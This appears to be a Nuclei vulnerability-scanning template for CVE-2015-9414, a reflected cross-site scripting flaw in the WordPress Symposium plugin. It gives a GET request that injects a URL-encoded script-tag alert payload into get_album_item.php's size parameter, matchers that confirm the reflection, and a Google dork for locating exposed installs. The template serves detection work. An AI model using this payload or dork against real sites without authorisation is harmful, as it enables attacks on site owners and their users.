49 lines
1.6 KiB
YAML
49 lines
1.6 KiB
YAML
id: CVE-2015-9414
|
|
|
|
info:
|
|
name: WordPress Symposium <=15.8.1 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
|
|
- https://wpvulndb.com/vulnerabilities/8175
|
|
- https://wordpress.org/plugins/wp-symposium/#developers
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2015-9414
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00111
|
|
cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:*
|
|
epss-percentile: 0.43615
|
|
metadata:
|
|
max-request: 1
|
|
google-query: inurl:"/wp-content/plugins/wp-symposium"
|
|
framework: wordpress
|
|
vendor: wpsymposiumpro
|
|
product: wp-symposium
|
|
tags: xss,wpscan,cve,cve2015,wordpress,wp-plugin
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '</script><script>alert(document.domain)</script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|